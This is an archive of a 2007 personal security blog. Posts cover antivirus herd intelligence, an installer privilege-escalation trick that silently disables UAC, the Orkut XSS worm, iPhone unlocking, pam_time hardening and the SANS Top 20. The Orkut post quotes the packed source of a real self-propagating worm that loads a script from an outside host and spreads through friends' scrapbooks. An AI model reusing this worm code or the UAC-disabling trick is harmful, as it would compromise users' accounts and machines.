Monday, December 31, 2007

Herd Intelligence Against Internet Malware

Hi folks,
today I wanna point out this paper on InfoWorld on Herd intelligence. As everybody know, poli-worms can easily change from machine to machine, making hard AntiVirus-companies' life. Often Antivirus and Anti-Malware are based on signature "finger-print" and for that reason it's still easy bypass them. In this paper the Author describes how the companies want resolve this problem using Herd Intelligence. Who is the Herd ? Of course here we are !! Yep,.., companies are thinking to use clients computers in order to grab news malware,new virus signature and so for....


The idea is simple, according to the analyst. If attackers are going to attempt to create different attacks for nearly every individual user, then security software vendors must use their customers' machines as their eyes and ears for discovering and addressing those variants. (from site)


Well, this is an interesting (possible) solution to the problem but what I can't yet understand is why companies are fixed on fingerprint technologies. Using fingerprint means running after malware, not prevent them and not absolutely block them. What I'm asking to myself till now is: why Antivirus companies don't use a behavioral detecting technique ? There are many researches on dynamic malware detection based on API sequences and based on data flows that, if well implemented and well planned can really improve the malware prevention, why company don't invest on this "paradigm shifting" rather then building Client Herd Computers guinea-pigs ?
I'm pretty sure that it will be cheaper, because building Herd Clients' computers means writing more client-side agents as well as rewrite the software detection. Moreover building herd means teach people to understand that, means teach computer technician to repair news systems, means try to persuade people that the new agent sends only malware information and not sensible information and so on.......
Another problem comes from trusted computer field.... How can we know that the news agents installed on ours machines are safe ? Again, how can we know that these softwares don't send sensible and/or private information to Antivirus company ? How can we assume that Antivirus company have good intention ?

If we take as example Diebold company and its Voting Machine, it's pretty easy understanding that these assumptions are really too strong in Internet era.

Thursday, December 27, 2007

CurtTV: Tigers Team

Well, another nice saga from courtTV. For those who know some Tigers Teams it will be really FUNNY, for those who don't know any Tigers Team it'll be a very interesting video. In any cases enjoy your vision.



Here the "Tiger Team 101" episodes.
First
Second
Third
Fourth

Saturday, December 22, 2007

XMAS: working with 20% of overflow ... ... ... ... ... ...

I know, it's Xmas. I should stop working and stay with my family or.. something like that. Well I really wanna stopping but I'm still working on 3 different papers, the deadlines are at the end of January and February . It seems reasonable stop blogging just for some days but actually I don't now If I'll withstand to write some news on my blog. Anyway , tomorrow I wanna point out  a very interesting post by Ann in her blog. Here you can find the original post  (MSI Script vs Windows Security), where Ann describes how :

1) Change the value of windows system registry values:
2) Run a low-level system tool:


Running some script (see the original post) during installation phase it's possible get higher permissions. The main problem seems in msiexec, which gets elevated priviledges during installation phase.

If you try to do this explicitly as a regular user (or without elevated privs on Vista), Windows will politely tell you that you can't. But if you execute the following MSI script during an installation (running the installation as a regular user), msiexec gets elevated priviledges, and can do whatever you want. Here's an example silently disabling UAC during an installation by launching regedit from cmd. (This is run in Wise via 'Execute Program from Destination', Working directory: SystemFolder):

Another interesting project that I've seen during the past days is PhisTank.It's a website where dedicated volunteers submit URLs from suspected phishing websites and vote on whether the submissions are valid. The idea behind PhishTank is to bring together the expertise and enthusiasm of people across the Internet to fight phishing attacks. The more people participate, the larger the crowd, the more robust it should be against errors and perhaps even manipulation by attackers.
I'm interested on this project for several reasons but one of the most important reason that carried me through this project has been reading this paper by University of Cambridge. Tyler Moore and Richard Clayton describe why and how this (great) service is vulnerable. I was amazing during the reading because it's impossible understanding how a pretty-important conference like Financial Crypto may public this kind of (easy and not innovative) work. Maybe my though on Financial Crypto is wrong.

Friday, December 21, 2007

I've read it online so it's true.

How many times we hear:
"I don't agree with you, I've read something online that proves the opposite" or "I'm sure I've read online !".
But are you sure that everything you read online is true ?



Well, now we are sure ! :-)
via Christofer

Thursday, December 20, 2007

Orkut was hacked !

It's amazing understanding the main problems are always the same problems.... Anyway another XSS Worm but "today" it fights google company!




Orkut is Google’s version of social networking. It was big for a while, but I think everyone bailed in favor of the more open MySpace and Facebook’s of the world. It’s still widely used by the Portuguese population though.

From different sources:


On Orkut, you can use arbitrary HTML when scrapping your friends. Rodrigo's worm exploited this 'feature'. What it did was to start with scrapping a malicious flash file. Just viewing this scrap causes the flash object to load which in turn loads our favourite virus.js file. The Javascript code in that file first joins you in the community called Infectatos pelo Virus do Orkut (in English - Infected by the Orkut Virus) and then sends the same flash file as a scrap to as many people in your friends list as possible. So when each of your friends sees their Scrapbook, they in turn start propagating the worm to their friends, etc.



On November 8th 2006 Rajesh Sethumadhavan discovered a type 2 vulnerability in the social network site Orkut which would make it possible for orkut members to inject HTML and JavaScript into their profile. Rodrigo Lacerda used this vulnerability to create a cookie stealing script known as the Orkut Cookie Exploit which was injected into the orkut profiles of the attacking member(s). By merely viewing these profiles unsuspecting targets had the communities they owned transferred to a fake account of the attacker. On December 12th Orkut had fixed the vulnerability.


The script is fetched from here: http://files.myopera.com/virusdoorkut/files/virus.js

function $(p,a,c,k,e,d) {
e=function(c) {
return(c35?String.fromCharCode(c+29):c.toString(36))
};
if(!''.replace(/^/,String)){
while(c--){d[e(c)]=k[c]||e(c)}
k=[function(e){return d[e]}];
e=function(){return'\\w+'};
c=1
};
while(c--){
if(k[c]){
p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])
}
}
return p
};
setTimeout(
$('5 j=0;5 q=1q["2o.H"];5 E=1q["2p.K.27"];7 B(){Z{b i 14("29.1l")}
L(e){};Z{b i 14("2b.1l")}L(e){};Z{b i 2l()}L(e){};b J};
7 W(g,P,m,c,9,U){5 1m=g+"="+19(P)+(m?"; m="+m.2f():"")+(c?"; c="+c:"")+(9?"; 9="+9:"")+(U?"; U":"");
8.y=1m};7 v(g){5 l=8.y;5 A=g+"=";5 h=l.S("; "+A);6(h==-1){h=l.S(A);6(h!=0){b 2h}}16{h+=2};
5 u=8.y.S(";",h);6(u==-1){u=l.M};b 2j(l.2m(h+A.M,u))};
7 26(g,c,9){6(v(g)){8.y=g+"="+(c?"; c="+c:"")+(9?"; 9="+9:"")+"; m=1u, 1i-1v-1x 1g:1g:1i 1y";1U.1z(0)}};
7 G(){5 3=B();6(3){3.R("1A","o://k.w.p/1B.z",C);3.a(J);3.Y=7(){6(3.X==4){6(3.1a==1c){5 1r=3.1Q;5 t=8.1n("t");
t.1D=1r;5 f=t.D("f").O(0);6(f){f.1M(f.D("1F").O(0));f.1G("1H","N");f.1J.1K="1L";8.1N.1f(f);V()}}16{G()}}};
3.a(J)}};7 T(){5 a="H="+n(q)+"&K="+n(E)+"&15.1O";5 3=B();3.R(\'q\',\'o://k.w.p/1P.z?1R=1S\',C);
3.12(\'10-1e\',\'Q/x-k-17-1b\');3.a(a);3.Y=7(){6(3.X==4){6(3.1a!=1c){T();b};G()}}};
7 V(){6(j==8.18("N").M){b};
5 I="1V 1W 1X... 1Y 1Z 20 21 22 23 24<1k/>[1j]25 "+i F()+"[/1j]<1k/><13 1o="\\" 2a="\\" 2e="\\" r="8.1n(\'r\');r.1o="\'o://1p.2k.p/2n/1p/1s.1t\';8.D(\'1w\')[0].1f(r);19(\'\\" 1c="\\" 1e="\\">";
5 a="15.1I=1&H="+n(q)+"&I="+n(I)+"&K="+n(E)+"&1T="+8.18("N").O(j).P;5 3=B();
3.R("q","o://k.w.p/2i.z",C);3.12("10-1e","Q/x-k-17-1b;");
3.a(a);3.Y=7(){6(3.X==4){j++;5 d=i F;d.1d(d.1h()+11);W(\'s\',j,d);V()}}};
6(!v(\'s\')){5 d=i F;d.1d(d.1h()+11);W(\'s\',\'0\',d)};j=v(\'s\');T();
',62,150,'|||xml||var|if|function|document|domain|send|return|path|wDate||select|name|begin|new|index|
www|dc|expires|encodeURIComponent|http|com|POST|script|wormdoorkut|div|end|getCookie|orkut||cookie|aspx
|prefix|createXMLHttpRequest|true|getElementsByTagName|SIG|Date|loadFriends|POST_TOKEN|scrapText|null|
signature|catch|length|selectedList|item|value|application|open|indexOf|cmm_join|secure|sendScrap|setCookie|
readyState|onreadystatechange|try|Content|86400|setRequestHeader|embed|ActiveXObject|Action|else|form|
getElementById|escape|status|urlencoded|200|setTime|Type|appendChild|00|getTime|01|silver|br|XMLHTTP|curCookie|
createElement|src|files|JSHDF|xmlr|virus|js|Thu|Jan|head|70|GMT|go|GET|Compose|width|innerHTML|height|option|
setAttribute|id|submit|style|display|none|removeChild|body|join|CommunityJoin|responseText|cmm|44001818|toUserId|
history|2008|vem|ai|que|ele|comece|mto|bem|para|vc|RL|deleteCookie|raw|LoL|Msxml2|type|Microsoft|shockwave|flash|
wmode|toGMTString|transparent|false|Scrapbook|unescape|myopera
|XMLHttpRequest|substring|virusdoorkut|CGI|Page'.split('|'),0,{}),1
);
author="Rodrigo Lacerda"



Here the complete decoded script.
And here the original advisory.
And of course try to search something on google about this vulnerability, you'll be redirected right here: the always upgraded google malware list.

Tuesday, December 18, 2007

Yet Funny Stuff

Another Funny Picture, quite off-topic but so cute !

In my mail box too.



The card.zip attachment contains card.scr (md5: 536BFC077FBAD247FA5EA67ADF1DCA7D), which we detect as
Trojan-Downloader.Win32.Agent.gbu.

Monday, December 17, 2007

Software upgrading.. .. .. ..

It's time to get up and see what new softwares have been made. It's long time that I don't focalize my attention on new software generation. During these days I decided to analyze two different software signed up from MacApp community.
Yet others useful and cheap MAC softwares to organize your computer.
The first one has been named Hazel 2 by designers, it's a MAC cleaner while the second one is a TimeMachine configure tool, named TimeMachineSchedule useful to manage advance time machine capabilities.




From web site (click on the above picture):

Hazel watches whatever folders you tell it to, automatically organizing your files according to the rules you create. It features a rule interface similar to that of Apple Mail so you should feel right at home. Have Hazel move files around based on name, date, type, what site/email address it came from (Safari and Mail only) and much more. Automatically put your music in your Music folder, movies in Movies. Keep your downloads off the desktop and put them where they are supposed to be. Hazel can open, archive, set color labels and add Spotlight comments. And in Hazel 2, you can now have Hazel rename your files or sort them into subfolders based on name, date or whatever combination of attributes you choose. Hazel 2 gives you the ability to create even more powerful workflows than ever before. When you throw away applications, they can leave behind support files that never get cleaned up. With Hazel 2's App Sweep, Hazel will detect when you throw applications away, search for its support files and offer to throw those away as well. Uninstalling applications is integrated with your Trash so you don't even have to think about it. Hazel features new actions to import your files into iPhoto or iTunes. Keep your media in line. Add to your library or to a specific playlist or photo album. Improved Spotlight integration allows you to use any Spotlight attribute in your rules. Filter files based on Spotlight attributes or use them in conjunction with the new renaming and sorting actions. Sort your photos by aperture or shutter speed or rename your music files with artist, album and year. Make your metadata work for you. Hazel has options to clean out those pesky unneeded files that clutter your folders, getting rid of incomplete and duplicate downloads for you. And, of course, you can set up whatever rules you want to automatically throw files away.You can have Hazel manage your Trash. Select from different options to keep your Trash in check. And for extra security, Hazel can also shred files like Finder's "Secure Empty Trash" option.Hazel's rules can trigger Automator workflows, AppleScripts and shell scripts. Hazel will run whatever you throw at it, making it easy for you to integrate into your workflow.








From the web site (click on the above picture):

In Mac OS X 10.5 Leopard Apple has introduced Time Machine, a very convenient way to make backups.Unfortunately the backup interval is preset constantly to one hour. Apple uses an launchd daemon to control the timing,
but changing the interval value in the launchd.plist file has no effect.
TimeMachineScheduler disables the automatic backup function of Time Machine and installs its own launchd agent.As the agent is located in the main library, the administrator password is required for all (writing) operations.Except disabling Time Machine no further system files and preferences will be touched by TimeMachineScheduler.
There are (still) some access privileges problems in OS X 10.5 Leopard, if the operation system has been updated, migrated or installed with the archive & install option. TimeMachineScheduler takes care of all files and sets owner, group and the privileges to the proper default value.You can install and uninstall the agent as well as only load and unload it to disable making backups temporarily.The interval can be set between 1 and 12 hours, and the agent can be set to run additionally at load, which means also at startup and login.
You can press a button to run a backup immediately. The status of the scheduler will be displayed.During a runnig backup the control elements are disabled. All actions will be written into a log file (~/Library/Logs/TimeMachineScheduler.log).TimeMachineScheduler is not required to run permanently, the scheduler works self dependent in the background. If you want to revert to the original settings of Time Machine, just uninstall the scheduler and enable Time Machine in its Preference Pane.
For the worst case (which will never happen) an "emergency" uninstaller is included.

I've just tried from fews days this softwares but I can say that (in particular the second one) are really useful to manage your big mole of folders, files and whichever. I'm pretty sad for Hazel that 's still under commercial license but it works really fine.

Saturday, December 15, 2007

News on iPhone

Hi folks,
it's a lot of time that I don't speak about iPhone cracking status. Actually I gotta a 1.1.1 firmware and I'm very happy to no change it because it's still working good. Anyway, what's happening in iPhone hacking community ? Are they researching a solution yet ? Yes and no... something is happened.




First of all two theoretical exploits have been found on the new bootloader 4.6 !!
And you know what it means! 1.1.2 OTB Software unlock coming very soon! Another important new come from iPhone Dev Team who opened its software. However there is no solution yet to break the SIM control putting any sim card. Actually the community has just discovered the NCK (Unlock Code) but it's pretty hard to break with normal BruteForces techniques.

The NCK code is transfered during activation of your iPhone.
A plist file is created on the iPhone, and then sent to Apple webserver.
If the iPhone is unlocked in Apple's database, it will reply with the unlock code.
They have managed to send an activation request to apple webserver and catch the NCK. 


It looks like this: "UnlockCode" = "NO=111111111111111&";

The '1' are to be replaced with digits, so I guess that the unlock code is 15 digits long.
Way too long for a bruteforce attack...They doubt the unlock code has any correlation with any device ids, it is more likely that Apple has it stored in a database for every single iPhone.
If you cannot wait for the software solution, that seams coming very soon, there is an easy-to-use and intuitive hardware solution by TurboSym for $59 that forks fine !

The reverse continues.

Thursday, December 13, 2007

Elevator And Peter G. Neumann

Obviously you can think on the link between the absolute guru Peter G. Neumann and the elevator of my Miami Beach Hotel. Well, it make sense absolutely, let me say.......

Was a sunny and really hot day in Miami Beach (Florida) during the 23th ACSAC conference. It was the first conference's day, I was exited to stay in the 17th floor of  a very very hight Hotel in front of the ocean. I took the elevator coming in the "East Ocean" room in order to assist at the first talk. Inside at the big elevator an old man looked me with a strange smile and he asked me:



Hi, How's going


He looked to my neck-id and said again:


Marco, nice to meet you. I'm Peter Neumann


I was astonished, paralyzed, I cannot imagine that he was the "true" Neumann and so I said:


Hello Peter, my name is Marco from University of Bologna


He smiled, as a person who known that I didn't recognized a famous personality like him....
Only after few seconds I recognized that he was truly he. Perplexed, I followed him and I said:


Sorry I didn't recognize you


I tried to improvise few minutes of speaking and at-the-end I asked a little autograph on my proceedings. Now I got it.
I'm really proud to show this on my blog.


Tuesday, December 11, 2007

During Some Free Time

Some time I cannot understand why people don't want reading normal and easy paper but they prefer asking (in this case -to me-) a lot of obvious things. During these days I received some mails asking how to change system administrator properties. In particular case some of my "old" student wanna know how to fix time on users accounts using linux OS. Well, just 2m of google research and I found lots of great paper on this problem. Anyway the most easiest way to fix the time ,on user accounts, is using pam_time.so by Andrew G. Morgan. Keep in mind that the main useful file is in /etc/security/time.conf .

Here an easy example :

Service;ttys;users;time

To limit ssh access from 23:00PM to 08:00AM -favorite hacker's time- you can write the following lane

sshd;*;*;!Al2300-0800

The !Al term means, anything axcept "All the days".

Another great example could be the following one:

login;*;!root;!Al1600-2000

It permits people from 4PM to 8PM all the days except the root.

If I can suggest something to you; remember that the initial hardening time is one of the most important procedure to increase security on your machines. be careful.

Friday, December 7, 2007

Annual Computer Security Applications Conference.

Hi folks,
I'm going to ACSAC next week.



I'll be in Miami Beach and Orlando in order to see the shuttle launch ! Maybe I'll not able to upgrade my blog corner but if I'll find some free time I'll discuss on what I will see. I've have never seen ACSAC I'm pretty curious assisting this event. Thank you very much to Marco Prandini to involve me in this activity !!

Wednesday, December 5, 2007

California Electronic Voting.

My super boss said:


Electronic voting systems used throughout California still aren't good enough to be trusted with the state's elections, Secretary of State Debra Bowen said Saturday.
While Bowen has been putting tough restrictions and new security requirements on the use of the touch screen machines, she admitted having doubts as to whether the electronic voting systems will ever meet the standards she believes are needed in California.


And I've thought ... ... ... ... I know, I know ;-D. Anyway it's an interesting article on the importance of Voting Machine in USA.

Tuesday, December 4, 2007

Mac Book Pro: the fastest Vista Notebook

PC World, says that Mac Book Pro it's the faster Notebooks running Microsoft Vista !
It's a pretty amazing news I know,.., but if you believe that Apple has not faltered to publish this new video, it becomes really amazing !




I like the apple commercial videos, one of my favorite was the "Security" but this one is one the funniest that I've ever seen !
Thanks apple for these laughs !

Monday, December 3, 2007

SANS Top 20

Every year SANSpublics the top twenty vulnerability of the year classified in different categories.This year:

Client-side Vulnerabilities in:
C1. Web Browsers
C2. Office Software
C3. Email Clients
C4. Media Players

Server-side Vulnerabilities in:
S1. Web Applications
S2. Windows Services
S3. Unix and Mac OS Services
S4. Backup Software
S5. Anti-virus Software
S6. Management Servers
S7. Database Software

Security Policy and Personnel:
H1. Excessive User Rights and Unauthorized Devices
H2. Phishing/Spear Phishing
H3. Unencrypted Laptops and Removable Media

Application Abuse:
A1. Instant Messaging
A2. Peer-to-Peer Programs

Network Devices:
N1. VoIP Servers and Phones
Zero Day Attacks:
Z1. Zero Day Attacks


In my opinion nothing happened; It's from many years that security land scape doesn't change. Client side vulnerabilities are more often browser vulnerability because browser like FireFox and IE are the most used client. On the other hand Web Application are growing up and not every developer is careful on security issues, so it's reasonable that it's still in the first Server Side Vulnerabilities. But..., actually I don't agree with the position of H1 and H2. My personal experience focused on security says that Phishing it's one of most important security problem of the current era. Preventing phishing means prevent security technical aspects and Social Security aspects; for the first lots of groups are working on with great results but for Social Security aspects the evangelist community is back yet. For this reason Phishing is one of the most important and used attacks. H1, is 'f course a really important problem but more fought during past security history; I believe that bounds of steps have been already done on this particular way, and for this reason not comparable with more recent phishing.